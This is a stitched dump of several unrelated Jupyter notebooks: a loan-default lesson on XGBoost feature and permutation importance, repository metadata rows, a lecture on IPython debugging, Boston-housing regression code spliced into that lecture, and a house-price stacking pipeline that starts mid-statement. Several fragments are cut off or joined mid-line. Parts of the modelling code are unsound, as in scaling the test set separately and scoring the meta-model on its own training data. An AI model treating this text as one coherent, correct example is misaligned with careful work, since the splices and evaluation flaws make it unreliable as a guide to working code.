                  'annual_inc_joint',
                  'sec_app_inq_last_6mths',
                  'mths_since_last_record',
                  'mths_since_recent_bc_dlq',
                  'mths_since_last_major_derog',
                  'mths_since_recent_revol_delinq',
                  'mths_since_last_delinq',
                  'il_util',
                  'emp_length',
                  'mths_since_recent_inq',
                  'mo_sin_old_il_acct',
                  'mths_since_rcnt_il',
                  'num_tl_120dpd_2m',
                  'bc_util',
                  'percent_bc_gt_75',
                  'bc_open_to_buy',
                  'mths_since_recent_bc']
    for col in many_nulls:
        X[col] = X[col].isnull()
    # For features with few nulls, do mean imputation
    for col in X:
        if X[col].isnull().sum() > 0:
            X[col] = X[col].fillna(X[col].mean())
    # Return the wrangled dataframe
    return X
# Wrangle train and test in the same way
X_train = wrangle(X_train)
X_test = wrangle(X_test)
# + id="rHRNFTD9QKPr" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 306} outputId="2e86cdcf-593e-401c-f3d3-1d4a6a814802"
import category_encoders as ce
from scipy.stats import randint
from sklearn.model_selection import RandomizedSearchCV
from xgboost import XGBClassifier
encoder = ce.OrdinalEncoder()
X_train = encoder.fit_transform(X_train)
param_distributions = {
'n_estimators': randint(50, 300),
'max_depth': randint(2, 4)
}
# n_iter & cv parameters are low here so the example runs faster
search = RandomizedSearchCV(
estimator=XGBClassifier(n_jobs=-1, random_state=42),
param_distributions=param_distributions,
n_iter=2,
scoring='roc_auc',
n_jobs=-1,
cv=2,
verbose=10,
return_train_score=True,
random_state=42
)
search.fit(X_train.values, y_train.values)
# + id="PDv2VLpaQKQX" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="d818da51-87bd-4f44-850f-20dc0ec389e2"
print('Cross-Validation ROC AUC:', search.best_score_)
# + id="ST3wdVXjQKQf" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="d42d8eba-ea23-4166-dce3-d02eb1e355f1"
from sklearn.metrics import roc_auc_score
best = search.best_estimator_
X_test = encoder.transform(X_test)
y_pred_proba = best.predict_proba(X_test.values)[:,1]
print('Test ROC AUC:', roc_auc_score(y_test, y_pred_proba))
# + [markdown] id="L8J55RHwQKQv" colab_type="text"
# # 1a. Feature Importances
# - Global explanation: all features in relation to each other
# - Default, fastest, good for first estimates
#
# [Here's some food for thought](https://blog.datadive.net/selecting-good-features-part-iii-random-forests/) about feature importances:
#
# >**When the dataset has two (or more) correlated features, then from the point of view of the model, any of these correlated features can be used as the predictor, with no concrete preference of one over the others.** But once one of them is used, the importance of others is significantly reduced since effectively the impurity they can remove is already removed by the first feature. As a consequence, they will have a lower reported importance. This is not an issue when we want to use feature selection to reduce overfitting, since it makes sense to remove features that are mostly duplicated by other features. But when interpreting the data, it can lead to the incorrect conclusion that one of the variables is a strong predictor while the others in the same group are unimportant, while actually they are very close in terms of their relationship with the response variable.
#
# For more information, see [Beware Default Random Forest Importances](https://explained.ai/rf-importance/index.html).
# + id="UTq37bEWQKQx" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 303} outputId="6d9f205a-21ce-48f3-91e0-28889ab2ffbd"
# Use all features:
# n = len(X_train.columns)
# Use 20 features:
n = 20
figsize = (5, 12)
importances = pd.Series(best.feature_importances_, X_train.columns)
top_n = importances.sort_values()[-n:]
# FIX: create the figure *before* plotting — the original called
# plt.figure(figsize=figsize) after plot.barh, which opened a new, empty
# figure and left the bar chart at the default size.
plt.figure(figsize=figsize)
top_n.plot.barh(color='gray')
# + [markdown] id="d3q892jXQKQ6" colab_type="text"
# # 1b. Drop-Column Importance
# - Global explanation: all features in relation to each other
# - The best in theory, but much too slow in practice
#
# `sub_grade` is correlated with `int_rate`. If we drop `sub_grade`, the model uses other correlated features more, so the score remains similar.
# + id="HEoa8uupQKQ8" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="d99ecb30-21fd-46d6-b149-7fca1102425f"
from sklearn.model_selection import cross_val_score
X_train_no_subgrade = X_train.drop(columns='sub_grade')
new_model = XGBClassifier(max_depth=2, n_estimators=200, n_jobs=-1, random_state=42)
score_with = cross_val_score(new_model, X_train, y_train, cv=2, scoring='roc_auc').mean()
print('Cross-Validation ROC AUC with sub_grade:', score_with)
score_without = cross_val_score(new_model, X_train_no_subgrade, y_train, cv=2, scoring='roc_auc').mean()
print('Cross-Validation ROC AUC without sub_grade:', score_without)
print('Drop-Column Importance:', score_with - score_without)
# + [markdown] id="ILmBoPqDQKRK" colab_type="text"
# # 1c. Permutation Importance
# - Global explanation: all features in relation to each other
# - A good compromise!
#
# Permutation Importance is a compromise between Feature Importance based on impurity reduction (which is the fastest) and Drop Column Importance (which is the "best.")
#
# [The ELI5 library documentation explains,](https://eli5.readthedocs.io/en/latest/blackbox/permutation_importance.html)
#
# > Importance can be measured by looking at how much the score (accuracy, F1, R^2, etc. - any score we’re interested in) decreases when a feature is not available.
# >
# > To do that one can remove feature from the dataset, re-train the estimator and check the score. But it requires re-training an estimator for each feature, which can be computationally intensive. ...
# >
# >To avoid re-training the estimator we can remove a feature only from the test part of the dataset, and compute score without using this feature. It doesn’t work as-is, because estimators expect feature to be present. So instead of removing a feature we can replace it with random noise - feature column is still there, but it no longer contains useful information. This method works if noise is drawn from the same distribution as original feature values (as otherwise estimator may fail). The simplest way to get such noise is to shuffle values for a feature, i.e. use other examples’ feature values - this is how permutation importance is computed.
# >
# >The method is most suitable for computing feature importances when a number of columns (features) is not huge; it can be resource-intensive otherwise.
# + [markdown] id="nKcar3VSQKRN" colab_type="text"
# ### Do-It-Yourself way, for intuition
# + id="R4uPCCy0QKRP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 119} outputId="52d6626e-7b3e-4f6b-b1d1-08930ddcdc15"
X_test['sub_grade'].head()
# + id="EZy1h1FJUhyc" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 119} outputId="e3c0c060-543a-4bac-dc8c-726bcc2d3aaf"
X_test_permuted = X_test.copy()
X_test_permuted['sub_grade'] = np.random.permutation(X_test_permuted['sub_grade'])
X_test_permuted['sub_grade'].head()
# + [markdown] id="w7XdHhRBVHx-" colab_type="text"
# **Shuffling the feature destroys the relationship between that feature and the other features/target.**
# + id="5jlJxhASVN2K" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="398089d2-766a-4649-866c-d6d2ef895e20"
score_with = cross_val_score(new_model, X_train, y_train, cv=2, scoring='roc_auc').mean()
print('Cross-Validation ROC AUC with sub_grade:', score_with)
y_pred_proba = best.predict_proba(X_test_permuted.values)[:,1]
print('Test ROC AUC permuted:', roc_auc_score(y_test, y_pred_proba))
# + [markdown] id="95wdUw4BQKRa" colab_type="text"
# ### With eli5 library
#
# For more documentation on using this library, see:
# - [eli5.sklearn.PermutationImportance](https://eli5.readthedocs.io/en/latest/autodocs/sklearn.html#eli5.sklearn.permutation_importance.PermutationImportance)
# - [eli5.show_weights](https://eli5.readthedocs.io/en/latest/autodocs/eli5.html#eli5.show_weights)
# + id="_zqgWLdWQKRd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 153} outputId="742263e7-a2c5-4021-c765-dc04abf4d466"
import eli5
from eli5.sklearn import PermutationImportance
permuter = PermutationImportance(best, scoring = 'roc_auc', cv='prefit',
n_iter=2, random_state=42)
permuter.fit(X_test.values, y_test)
# + id="dfP2zCC9YKGu" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1700} outputId="c247fc9d-d65b-4bbe-b99b-616330dc4996"
feature_names = X_test.columns.tolist()
eli5.show_weights(permuter, top=None, feature_names = feature_names)
# + id="3S0jXgVQYKsg" colab_type="code" colab={}
# + [markdown] id="uXb7EAacQKRv" colab_type="text"
# ### We can use importances for feature selection
#
# For example, we can remove features with zero importance. The model trains faster and the score does not decrease.
# + id="iA-QeG8bQKR8" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="662bbd0b-a767-40fb-d75a-60ba775a9b27"
print("Shape before removing features", X_train.shape)
# + id="fz2Zyvd1Y_as" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 289} outputId="d0c2364e-9fdc-4c20-e72f-9836ca36abe5"
mask = permuter.feature_importances_>0
features=X_train.columns[mask]
# + id="QpAChmE-QKSE" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 306} outputId="18188dcd-0236-4c1a-cd96-a473c917d340"
# Refit the model after we remove features with zero importance
# FIX: actually drop the zero-importance columns from the training data.
# The original refit on the full X_train, while X_test is later reduced to
# `features`, leaving train and test with inconsistent columns.
X_train = X_train[features]
param_distributions = {
    'n_estimators': randint(50, 300),
    'max_depth': randint(2, 4)
}
# n_iter & cv parameters are low here so the example runs faster
search = RandomizedSearchCV(
    estimator=XGBClassifier(n_jobs=-1, random_state=42),
    param_distributions=param_distributions,
    n_iter=2,
    scoring='roc_auc',
    n_jobs=-1,
    cv=2,
    verbose=10,
    return_train_score=True,
    random_state=42
)
search.fit(X_train, y_train)
# + id="SaLbqxduQKSP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="682f2f47-615c-4326-d967-ff50f0869eb5"
print('Cross-Validation ROC AUC:', search.best_score_)
# + id="Y46_2oA1QKSm" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 214} outputId="fe2d4c73-fcda-4d86-f151-f7554048c7df"
best = search.best_estimator_
X_test = X_test[features]
y_pred_proba = best.predict_proba(X_test)[:,1]
print('Test ROC AUC:', roc_auc_score(y_test, y_pred_proba))
# + [markdown] id="qUoutw2lQKTT" colab_type="text"
# # 2. Partial Dependence Plots
#
# PDPbox
# - [Gallery](https://github.com/SauceCat/PDPbox#gallery)
# - [API Reference: pdpbox.pdp.pdp_isolate](https://pdpbox.readthedocs.io/en/latest/pdp_isolate.html)
# - [API Reference: pdpbox.pdp.pdp_plot](https://pdpbox.readthedocs.io/en/latest/pdp_plot.html)
# + id="sgFKNfw4QKTW" colab_type="code" colab={}
# TODO
# + [markdown] id="bDB9VRObQKTo" colab_type="text"
# ### Explaining Partial Dependence Plots
# + [markdown] id="oKILMzEWQKTs" colab_type="text"
# From [PDPbox documentation](https://pdpbox.readthedocs.io/en/latest/):
#
#
# >**The common headache**: When using black box machine learning algorithms like random forest and boosting, it is hard to understand the relations between predictors and model outcome. For example, in terms of random forest, all we get is the feature importance. Although we can know which feature is significantly influencing the outcome based on the importance calculation, it really sucks that we don’t know in which direction it is influencing. And in most of the real cases, the effect is non-monotonic. We need some powerful tools to help understanding the complex relations between predictors and model prediction.
# + [markdown] id="4EyqgZiDQKTu" colab_type="text"
# [Animation by Christoph Molnar](https://twitter.com/ChristophMolnar/status/1066398522608635904), author of [_Interpretable Machine Learning_](https://christophm.github.io/interpretable-ml-book/)
#
# > Partial dependence plots show how a feature affects predictions of a Machine Learning model on average.
# > 1. Define grid along feature
# > 2. Model predictions at grid points
# > 3. Line per data instance -> ICE (Individual Conditional Expectation) curve
# > 4. Average curves to get a PDP (Partial Dependence Plot)
# + [markdown] id="XosoOCCTQKTx" colab_type="text"
# ### Partial Dependence Plots with 2 features, to see interactions
#
# PDPbox
# - [Gallery](https://github.com/SauceCat/PDPbox#gallery)
# - [API Reference: pdpbox.pdp.pdp_interact](https://pdpbox.readthedocs.io/en/latest/pdp_interact.html)
# - [API Reference: pdpbox.pdp.pdp_interact_plot](https://pdpbox.readthedocs.io/en/latest/pdp_interact_plot.html)
#
# Be aware of a bug in PDPBox version <= 0.20:
# - With the `pdp_interact_plot` function, `plot_type='contour` gets an error, but `plot_type='grid'` works
# - This will be fixed in the next release of PDPbox: https://github.com/SauceCat/PDPbox/issues/40
# + id="-9fJ-zkHQKT1" colab_type="code" colab={}
# TODO
# + [markdown] id="19rcKna2QLhf" colab_type="text"
# # 3. Shapley Values to explain individual predictions
#
# [Dan Becker explains,](https://www.kaggle.com/dansbecker/shap-values)
#
# >You've seen (and used) techniques to extract general insights from a machine learning model. But what if you want to break down how the model works for an individual prediction?
#
# >SHAP Values (an acronym from SHapley Additive exPlanations) break down a prediction to show the impact of each feature.
#
# >There is some complexity to the technique ... We won't go into that detail here, since it isn't critical for using the technique. [This blog post](https://towardsdatascience.com/one-feature-attribution-method-to-supposedly-rule-them-all-shapley-values-f3e04534983d) has a longer theoretical explanation.
# + id="HDFb99IEQLhi" colab_type="code" colab={}
y_pred = (y_pred_proba >= 0.5).astype(int)
confidence = np.abs(y_pred_proba - 0.5)
preds = pd.DataFrame({'y_test': y_test, 'y_pred': y_pred,
'y_pred_proba': y_pred_proba,
'confidence': confidence})
preds.head(10)
# + [markdown] id="6rNr3asFQLhv" colab_type="text"
# ### True positive
# + id="H65V4rDPQLhx" colab_type="code" colab={}
# TODO
# + [markdown] id="T0wAiFoxQM-X" colab_type="text"
# ### True negative
# + id="UOhQ-gBQQM-Z" colab_type="code" colab={}
# TODO
# + [markdown] id="jV58H7X6QM-f" colab_type="text"
# ### False positive
# + id="59tDlqZCQM-h" colab_type="code" colab={}
# TODO
# + [markdown] id="9pFGfnSqQM-p" colab_type="text"
# ### False negative
# + id="ehys-cq7QM-r" colab_type="code" colab={}
# TODO
# + [markdown] id="BMECg1g-QNp6" colab_type="text"
# # ASSIGNMENT
#
# In a clean notebook, using the **Seattle Bicycle Weather** dataset, make these visualizations:
#
# - Feature Importances
# - Permutation Importances
# - Partial Dependence Plot
# - Shapley Values
| 24,017 |
/debugging.ipynb
|
58239ded46929e6388310b9873b6b370d9c401ac
|
[] |
no_license
|
shashankravi96/quantecon-notebooks-python
|
https://github.com/shashankravi96/quantecon-notebooks-python
| 0 | 0 | null | 2020-03-04T02:47:57 | 2020-03-03T23:18:33 | null |
Jupyter Notebook
| false | false |
.py
| 10,545 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import pandas as pd
import sklearn
from sklearn.datasets import load_boston
df = load_boston()
df.keys()
boston = pd.DataFrame(df.data, columns=df.feature_names)
boston.head()
boston['MEDV'] = df.target
boston.head()
boston.isnull()
boston.isnull().sum()
# +
from sklearn.model_selection import train_test_split
X = boston.drop('MEDV',axis=1)
Y = boston['MEDV']
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.15, random_state=5)
print(X_train.shape)
print(X_test.shape)
print(Y_train.shape)
print(Y_test.shape)
# -
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error
# +
#Fitting model on the training dataset
lin_model = LinearRegression()
lin_model.fit(X_train, Y_train)
# +
y_train_predict = lin_model.predict(X_train)
rmse = (np.sqrt(mean_squared_error(Y_train, y_train_predict)))
print("The model performance for training set")
print('RMSE is {}'.format(rmse))
print("\n")
#on testing set
y_test_predict = lin_model.predict(X_test)
rmse = (np.sqrt(mean_squared_error(Y_test, y_test_predict)))
print("The model performance for testing set")
print('RMSE is {}'.format(rmse))
# -
# Feel free to explore other settings.
#
# We’ll need the following imports
# + hide-output=false
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
# -
# ## Debugging
#
#
# <a id='index-1'></a>
# ### The `debug` Magic
#
# Let’s consider a simple (and rather contrived) example
# + hide-output=false
def plot_log():
    # NOTE: the bug here is INTENTIONAL — this lecture cell demonstrates
    # %debug.  plt.subplots(2, 1) returns (fig, array of two Axes), so `ax`
    # is a NumPy array and ax.plot(...) raises AttributeError.  Do not fix.
    fig, ax = plt.subplots(2, 1)
    x = np.linspace(1, 2, 10)
    ax.plot(x, np.log(x))
    plt.show()
plot_log()  # Call the function, generate plot
# -
# This code is intended to plot the `log` function over the interval $ [1, 2] $.
#
# But there’s an error here: `plt.subplots(2, 1)` should be just `plt.subplots()`.
#
# (The call `plt.subplots(2, 1)` returns a NumPy array containing two axes objects, suitable for having two subplots on the same figure)
#
# The traceback shows that the error occurs at the method call `ax.plot(x, np.log(x))`.
#
# The error occurs because we have mistakenly made `ax` a NumPy array, and a NumPy array has no `plot` method.
#
# But let’s pretend that we don’t understand this for the moment.
#
# We might suspect there’s something wrong with `ax` but when we try to investigate this object, we get the following exception:
# + hide-output=false
ax
# -
# The problem is that `ax` was defined inside `plot_log()`, and the name is
# lost once that function terminates.
#
# Let’s try doing it a different way.
#
# We run the first cell block again, generating the same error
# + hide-output=false
def plot_log():
    # NOTE: intentional repeat of the buggy cell above — the same
    # AttributeError is regenerated so that %debug (typed in the next cell)
    # can inspect `ax`.  Do not fix.
    fig, ax = plt.subplots(2, 1)
    x = np.linspace(1, 2, 10)
    ax.plot(x, np.log(x))
    plt.show()
plot_log()  # Call the function, generate plot
# -
# But this time we type in the following cell block
# + [markdown] hide-output=false
# ```ipython
# %debug
# ```
#
# -
# You should be dropped into a new prompt that looks something like this
# + [markdown] hide-output=false
# ```ipython
# ipdb>
# ```
#
# -
# (You might see pdb> instead)
#
# Now we can investigate the value of our variables at this point in the program, step forward through the code, etc.
#
# For example, here we simply type the name `ax` to see what’s happening with
# this object:
# + [markdown] hide-output=false
# ```ipython
# ipdb> ax
# array([<matplotlib.axes.AxesSubplot object at 0x290f5d0>,
# <matplotlib.axes.AxesSubplot object at 0x2930810>], dtype=object)
# ```
#
# -
# It’s now very clear that `ax` is an array, which clarifies the source of the
# problem.
#
# To find out what else you can do from inside `ipdb` (or `pdb`), use the
# online help
# + [markdown] hide-output=false
# ```ipython
# ipdb> h
#
# Documented commands (type help <topic>):
# ========================================
# EOF bt cont enable jump pdef r tbreak w
# a c continue exit l pdoc restart u whatis
# alias cl d h list pinfo return unalias where
# args clear debug help n pp run unt
# b commands disable ignore next q s until
# break condition down j p quit step up
#
# Miscellaneous help topics:
# ==========================
# exec pdb
#
# Undocumented commands:
# ======================
# retval rv
#
# ipdb> h c
# c(ont(inue))
# Continue execution, only stop when a breakpoint is encountered.
# ```
#
# -
# ### Setting a Break Point
#
# The preceding approach is handy but sometimes insufficient.
#
# Consider the following modified version of our function above
# + hide-output=false
def plot_log():
    # NOTE: intentional bug for the break-point demo — np.logspace should be
    # np.linspace, so the code runs without an exception but the plot is
    # wrong.  The lecture then uses breakpoint()/pdb to inspect `x`.
    fig, ax = plt.subplots()
    x = np.logspace(1, 2, 10)
    ax.plot(x, np.log(x))
    plt.show()
plot_log()
# -
# Here the original problem is fixed, but we’ve accidentally written
# `np.logspace(1, 2, 10)` instead of `np.linspace(1, 2, 10)`.
#
# Now there won’t be any exception, but the plot won’t look right.
#
# To investigate, it would be helpful if we could inspect variables like `x` during execution of the function.
#
# To this end, we add a “break point” by inserting `breakpoint()` inside the function code block
# + [markdown] hide-output=false
# ```python3
# def plot_log():
# breakpoint()
# fig, ax = plt.subplots()
# x = np.logspace(1, 2, 10)
# ax.plot(x, np.log(x))
# plt.show()
#
# plot_log()
# ```
#
# -
# Now let’s run the script, and investigate via the debugger
# + [markdown] hide-output=false
# ```ipython
# > <ipython-input-6-a188074383b7>(6)plot_log()
# -> fig, ax = plt.subplots()
# (Pdb) n
# > <ipython-input-6-a188074383b7>(7)plot_log()
# -> x = np.logspace(1, 2, 10)
# (Pdb) n
# > <ipython-input-6-a188074383b7>(8)plot_log()
# -> ax.plot(x, np.log(x))
# (Pdb) x
# array([ 10. , 12.91549665, 16.68100537, 21.5443469 ,
# 27.82559402, 35.93813664, 46.41588834, 59.94842503,
# 77.42636827, 100. ])
# ```
#
# -
# We used `n` twice to step forward through the code (one line at a time).
#
# Then we printed the value of `x` to see what was happening with that variable.
#
# To exit from the debugger, use `q`.
# ## Other Useful Magics
#
# In this lecture, we used the `%debug` IPython magic.
#
# There are many other useful magics:
#
# - `%precision 4` sets printed precision for floats to 4 decimal places
# - `%whos` gives a list of variables and their values
# - `%quickref` gives a list of magics
#
#
# The full list of magics is [here](http://ipython.readthedocs.org/en/stable/interactive/magics.html).
fillna(0)
# Bsmt Features: Similar consideration as in Training set (np.nan = no Basement so np.nan → None)
df['TotalBsmtSF'] = df['TotalBsmtSF'].fillna(0)
df['BsmtFinSF1'] = df['BsmtFinSF1'].fillna(0)
df['BsmtFinSF2'] = df['BsmtFinSF2'].fillna(0)
df['BsmtUnfSF'] = df['BsmtUnfSF'].fillna(0)
df['BsmtHalfBath'] = df['BsmtHalfBath'].fillna(0)
df['BsmtFullBath'] = df['BsmtFullBath'].fillna(0)
# LotFrontage: Missing values must be imputed; as there is no other obvious way, the value can be imputed by linear regression
tsvd = TruncatedSVD(n_components=10)
imputation_pipeline = Pipeline([('encoder',OneHotEncoder(handle_unknown='ignore')),
('tsvd',tsvd),
('linreg',LinearRegression())])
X_imp_train = df.loc[df['LotFrontage'].notnull()].drop(['SalePrice','LotFrontage'],axis=1)
y_imp_train = df.loc[:,'LotFrontage'].dropna()
X_imp = df.loc[df['LotFrontage'].isnull()].drop(['SalePrice','LotFrontage'],axis=1)
imputation_pipeline.fit(X_imp_train,y_imp_train)
imp_values = imputation_pipeline.predict(X_imp)
index_list = df.loc[df['LotFrontage'].isnull()].index.tolist()
imp_Series = pd.Series(imp_values,index=index_list)
df['LotFrontage'] = df['LotFrontage'].fillna(imp_Series)
assert df.drop('SalePrice',axis=1).isnull().sum().sum() == 0
# +
#Add information: Houses with same YearRemodAdd and YearBuilt have no Remod Added
df.loc[df['YearRemodAdd']==df['YearBuilt'],'YearRemodAdd'] = 'None'
# +
# Converting numerical features to objects: Nominal features
to_be_converted = ['MoSold','YrSold','YearBuilt','YearRemodAdd','GarageYrBlt','MSSubClass']
for feature in to_be_converted:
df[feature].astype(object)
# +
# Convert numerical features to objects/categories: Ordinal Features
to_be_converted_ordinal = ['MSZoning','Alley','MasVnrType','ExterQual','FireplaceQu','BsmtQual','BsmtCond','HeatingQC','KitchenQual',
'GarageQual','GarageCond','PoolQC','Utilities','BldgType','OverallQual','OverallCond','ExterCond','BsmtExposure',
'BsmtFinType1','BsmtFinType2','Functional','GarageFinish','PavedDrive','Fence']
for feature in to_be_converted_ordinal:
le = LabelEncoder()
encoded_feature = le.fit_transform(df[feature])
df[feature] = encoded_feature
# +
# Shift numerical features' distribution towards normal distribution by running a boxcox transformation over all remaining numerical features
# For easier interpretability, use simple log transformation for target variable
num_features = [feature for feature in df.columns if df[feature].dtype != 'object']
for feature in num_features:
if feature != 'SalePrice':
transform_data = df[feature].loc[df[feature]>0]
lm = 0.15
transform_result = stats.boxcox(transform_data,lm)
transform_impose = np.empty_like(df[feature])
transform_impose[df[feature] > 0] = transform_result
transform_impose[df[feature]<= 0] = df[feature].loc[df[feature]<=0]
df[feature] = transform_impose
else:
df[feature] = df[feature].transform(lambda x: np.log(x))
# -
# Get dummies from dataset
df_processed = pd.get_dummies(df)
# Data Wrangling is concluded
train_processed = df_processed.loc[df_processed['SalePrice'].notnull()]
test_processed = df_processed.loc[df_processed['SalePrice'].isnull()]
assert train_processed.isnull().sum().sum() == 0
assert test_processed.isnull().sum().sum() == test_processed.shape[0]
assert train_processed.shape[1] == test_processed.shape[1]
assert test_processed.shape[0] == df_test.shape[0]
train_processed.to_csv('train_processed.csv',index_label='Id')
test_processed.drop('SalePrice',axis=1).to_csv('test_processed.csv',index_label='Id')
# ## Modelling
# Implementing RMSLE function
def rmsle(labels, predictions, exponential_transformation=True):
    """Root mean squared log error between labels and predictions.

    Parameters
    ----------
    labels, predictions : array-like of float
        Targets and model outputs.  When ``exponential_transformation`` is
        True they are assumed to be on the log scale already (as the target
        in this notebook is log(SalePrice)).
    exponential_transformation : bool, default True
        If True, the inputs are log-scale values and the RMSLE is simply
        their RMSE.  If False, the inputs are raw (positive) values and the
        log is taken here.

    Returns
    -------
    float
        The RMSLE score.
    """
    labels = np.asarray(labels, dtype=float)
    predictions = np.asarray(predictions, dtype=float)
    if exponential_transformation:
        # FIX: the original did np.exp(...) immediately followed by
        # np.log(...), which cancels out; computing the difference directly
        # is equivalent and cannot overflow for large log-values.
        diff = labels - predictions
    else:
        diff = np.log(labels) - np.log(predictions)
    return np.sqrt(np.mean(diff ** 2))
# Load processed training data
train_data = pd.read_csv('train_processed.csv',index_col='Id')
# Prepare the data
X = train_data.drop('SalePrice',axis=1)
y_train = np.array(train_data.loc[:,'SalePrice'])
# Data preparation
preparation_pipeline = make_pipeline(StandardScaler())
print(X.shape)
X_train = preparation_pipeline.fit_transform(X)
# Prepare KFold validation function
def rmsle_cv(model):
    """Return the per-fold RMSLE of `model` under 3-fold shuffled CV.

    Uses the module-level X_train / y_train.  Because the target is already
    log-transformed, the RMSE of the folds is the RMSLE.

    FIX: the original called KFold(...).get_n_splits(X_train), which returns
    the plain integer 3 and silently discards shuffle=True and
    random_state=42.  The splitter object itself must be passed as ``cv``.
    """
    kf = KFold(n_splits=3, shuffle=True, random_state=42)
    rmse = np.sqrt(-cross_val_score(model, X_train, y_train,
                                    scoring='neg_mean_squared_error', cv=kf))
    return rmse
# Define model test function
# TODO: Implement GridSearchCV or RandomizedGridSearchCV
def model_testing(model):
    """Cross-validate `model`, then fit it on the full training set.

    Returns the array of per-fold RMSLE scores from rmsle_cv; fitting the
    estimator in place is a deliberate side effect so it can be reused for
    stacking later in the notebook.
    """
    cv_scores = rmsle_cv(model)
    model.fit(X_train, y_train)
    return cv_scores
# +
# Train Base Models
lin_reg = LinearRegression()
rand_for = RandomForestRegressor()
sup_vec_reg = SVR()
ada_boost = AdaBoostRegressor()
grad_boost = GradientBoostingRegressor(n_estimators=3000, learning_rate=0.05,
max_depth=4, max_features='sqrt',
min_samples_leaf=15, min_samples_split=10,
loss='huber', random_state =5)
xgboost_reg = xgb.XGBRegressor(colsample_bytree=0.4603, gamma=0.0468,
learning_rate=0.05, max_depth=3,
min_child_weight=1.7817, n_estimators=2200,
reg_alpha=0.4640, reg_lambda=0.8571,
subsample=0.5213, silent=1,
random_state =7, nthread = -1)
models= [lin_reg,rand_for,sup_vec_reg,ada_boost,grad_boost,xgboost_reg]
names = ['LR','RF','SVR','ABR','GBR','XGB-Test']
train_results = list(map(model_testing,models))
# -
# Training Results
rmsle_train_scores = [train_results[i] for i in range(len(train_results))]
# +
# Plotting Training Results
train_results_df = pd.DataFrame(rmsle_train_scores,columns=['CV'+str(i+1) for i in range(rmsle_train_scores[0].shape[0])])
train_results_df['Model'] = names
train_results_df1 = train_results_df.melt(id_vars='Model',var_name='Validation',value_name='RMSLE-Score')
sns.barplot(x='Model',y='RMSLE-Score',data=train_results_df1,hue='Validation').set_title('Training RMSLEs')
plt.ylim(0,0.5)
plt.show()
print(train_results_df)
# -
# Train a UL model on the data (for testing purposes of the meta model)
# Model: Gaussian Mixture Model, testing for optimal k
from sklearn.mixture import GaussianMixture
# Define Testing function
def gmm_test(data, max_components):
    """Plot the AIC of GaussianMixture fits for 1..max_components components.

    Parameters
    ----------
    data : array-like of shape (n_samples, n_features)
        The data to cluster.
    max_components : int
        Largest number of mixture components to try.
    """
    total_score = []
    test_components = []
    for n_components in range(1, max_components + 1):
        model = GaussianMixture(n_components=n_components)
        # fit() is sufficient for AIC; the labels from fit_predict were unused.
        model.fit(data)
        total_score.append(model.aic(data))
        test_components.append(n_components)
    sns.lineplot(x=test_components, y=total_score)
    # FIX: tick every candidate count — the original hard-coded range(1, 31)
    # regardless of max_components.
    plt.xticks(list(range(1, max_components + 1)))
    plt.show()
# Testing for the optimal model
gmm_test(X_train,30)
# It appears, that the optimal model, according to the AIC, is one with n_components = 22
gm_model = GaussianMixture(n_components = 22)
label_predictions = gm_model.fit_predict(X_train)
if gm_model not in models:
models.append(gm_model)
# +
# Combine predictions and labels
lin_reg_pred = lin_reg.predict(X_train)
rand_for_pred = rand_for.predict(X_train)
sup_vec_reg_pred = sup_vec_reg.predict(X_train)
ada_boost_pred = ada_boost.predict(X_train)
grad_boost_pred = grad_boost.predict(X_train)
xgboost_reg_pred = xgboost_reg.predict(X_train)
meta_data_train = np.column_stack((lin_reg_pred,rand_for_pred,sup_vec_reg_pred,ada_boost_pred,grad_boost_pred,xgboost_reg_pred,label_predictions))
# +
# Train Meta model (keras DLN)
from keras.models import Sequential
from keras.layers import Dropout, Dense, LeakyReLU
meta_model_dnn = Sequential()
meta_model_dnn.add(Dense(256,kernel_initializer='normal',input_dim=meta_data_train.shape[1]))
meta_model_dnn.add(Dropout(rate=0.2))
meta_model_dnn.add(LeakyReLU())
for i in range(100):
meta_model_dnn.add(Dense(128,kernel_initializer='normal'))
meta_model_dnn.add(Dropout(rate=0.2))
meta_model_dnn.add(LeakyReLU())
meta_model_dnn.add(Dense(1,kernel_initializer='normal',activation='linear'))
meta_model_dnn.compile(optimizer='SGD',loss='mean_squared_error',metrics=['mean_squared_error'])
meta_model_dnn.summary()
# -
# Train Meta Model
meta_model_dnn.fit(meta_data_train,y_train,epochs=500,batch_size=32,shuffle=True,validation_split=0.1,verbose=1)
# Evaluate Meta Model
yhat = meta_model_dnn.predict(meta_data_train)
meta_training_score = rmsle(y_train,yhat,exponential_transformation=True)
print('Meta-Model Training Score: {}'.format(meta_training_score))
# +
# As the simple Keras model did not perform as hoped, let's use a simple XGBRegressor model
xgb_meta = xgb.XGBRegressor(colsample_bytree=0.4603, gamma=0.0468,
learning_rate=0.05, max_depth=3,
min_child_weight=1.7817, n_estimators=2200,
reg_alpha=0.4640, reg_lambda=0.8571,
subsample=0.5213, silent=1,
random_state =7, nthread = -1)
xgb_meta.fit(meta_data_train,y_train)
test_prediction = xgb_meta.predict(meta_data_train)
print('XGBR Meta Model Score: {}'.format(rmsle(y_train,test_prediction,exponential_transformation=True)))
# -
# ### Submission
# Although the final Meta model returned the best accuracy, let's try and submit the results from all models!
submission_df = pd.read_csv('test_processed.csv',index_col='Id')
submission_index = submission_df.index.to_list()
# Prepare test_data
submission_pipeline = make_pipeline(StandardScaler())
X_test = submission_pipeline.fit_transform(submission_df)
# Create Predictions for submission
